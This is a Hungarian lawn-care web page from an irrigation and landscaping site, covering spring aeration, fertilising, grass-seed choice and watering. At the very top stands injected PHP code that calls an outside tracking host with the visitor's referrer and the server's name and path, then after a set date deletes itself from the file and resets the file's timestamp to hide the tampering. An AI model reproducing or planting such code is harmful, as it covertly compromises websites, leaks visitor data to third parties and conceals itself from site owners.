check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Kertépítés, gyepápolás

Tavaszi pázsitápolási teendők

 

ontozzokosan gyepszelloztetogepTavasszal számos teendő adódik a gyepen, hogy igazán szép pázsitot lássunk kertünkben, feltétlenül végezzük el az alábbi munkákat: Talajlazítás, gyepszellőztetés, melynek segítségével a téli hónapokban felgyülemlett, elhalt, száraz fűből álló filcréteget, mohát és egyéb növényi maradványokat távolítunk el. A talajlazítással meglazítjuk a földet és kiszedjük az elhalt nővényi maradványokat, ezáltal elősegítjük a talaj, víz és levegő háztartását. Ha végeztünk a gyepszellőztetéssel juttassunk ki speciális gyeptrágyát, mely nitrogénben túlsúlyos és lassú lebomlású legyen. Az egyéb tápanyagok, kálium, foszfor, magnézium, stb., elősegítik a megfelelő gyökérfejlődést, mélyzöld és erős gyepet hoznak létre. Érdemes felülvetni a gyepfelületet jó minőségű fűmaggal, ezzel is felszámolva a kopottas területeket, csak így érhetjük el a folyamatosan dús pázsitfelületet. Az öntözőrendszert a nappali felmelegedéssel együtt indítsuk be és fokozatosan növeljük a kijuttatott víz mennyiségét. A munkák végeztével figyeljük a pázsitnyírási magasságára. Tavasszal nyugodtan nyírhatjuk alacsonyabbra a gyepet.

Bővebben...
 

A zöld szőnyeg

 

ontozzokosan fuEgy ápolt kerthez, illetve udvarhoz hozzátartozik a megfelelően gondozott gyep. Ma már nagyon könnyű dolgunk van, ha egységesen zöld gyepet szeretnénk kialakítani házunk udvarán. Kora tavasztól késő őszig bármelyik időpont ideális a gyep vetésére, telepítésére. Arra azonban figyelnünk kell, hogy az igényeknek megfelelően válasszunk a fűmag fajták közül. Árnyékos helyre kifejezetten csak árnyéktűrő fajtákat célszerű vetni. Ha kézzel vetünk, akkor a fűmagokat szélcsendes időben ajánlatos elszórni, majd egy gereblye fokával 0,5 cm mélyen beledolgozni a talajba, végül lehengerelni és megöntözni a területet.

Bővebben...
 

Milyen fűmagot válasszunk

 

ontozzokosan fumagLeggyakrabban a sport-, illetve a pázsitfűmag-keveréket használjuk, az előbbi jobban bírja a taposást, az utóbbi élénkebb színű. Különleges pázsitot, amit kevesebbszer kell nyírni, mégis sűrűbb lesz, golf típusú keverékekkel érhetünk el. Arra viszont számítanunk kell, hogy igényesebb ápolást, törődést kíván, mert a gyomok feltűnőbbek benne, és nagyobb a vízigénye. Igaz, van már mód a pázsit vegyszeres gyomirtására, de ezeknek a szereknek a használata nálunk sajnos kiskertekben még nem engedélyezett, kivéve a Calcurea, amely szemcsés anyag, így könnyen kiszórható és a folyékony állagú Gyomstop, amely egyszerűen permetezhető. Arra ügyeljünk, hogy a szerek használatakor feltétlenül nedves legyen a fű. A kiválasztott fűmagot, ha szélcsendes az idő, négyzetméterenként 4-5 dkg-ot szórjunk el a lehető legegyenletesebben. Javaslom, hogy mérjünk ki pár négyzetméterre való magot, és szórjuk el, így láthatjuk, milyen sűrűre kell vetnünk a magot.

Bővebben...
 

A gyep öntözése

 

Az angolosan zöld gyep nevelése nem ördöngösség. Megnyugtató szemnek is, talpnak is az egyenletesen puha és hibátlanul zöld pázsit. A foltok, gyomok az esetleges betegségek viszont annál több bosszúságot okoznak. Tény, hogy a nyugat-európai országok párásabb, csapadékosabb klímája sokkal kedvezőbb az üde zöld pázsit neveléséhez, mint a mi száraz éghajlatunk, de ez ne szegje kedved, egy kis gondossággal szép smaragd zöld gyepet varázsolhatsz Te is.

Bővebben...
 
« ElsőElőző12KövetkezőUtolsó »

1. oldal / 2
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú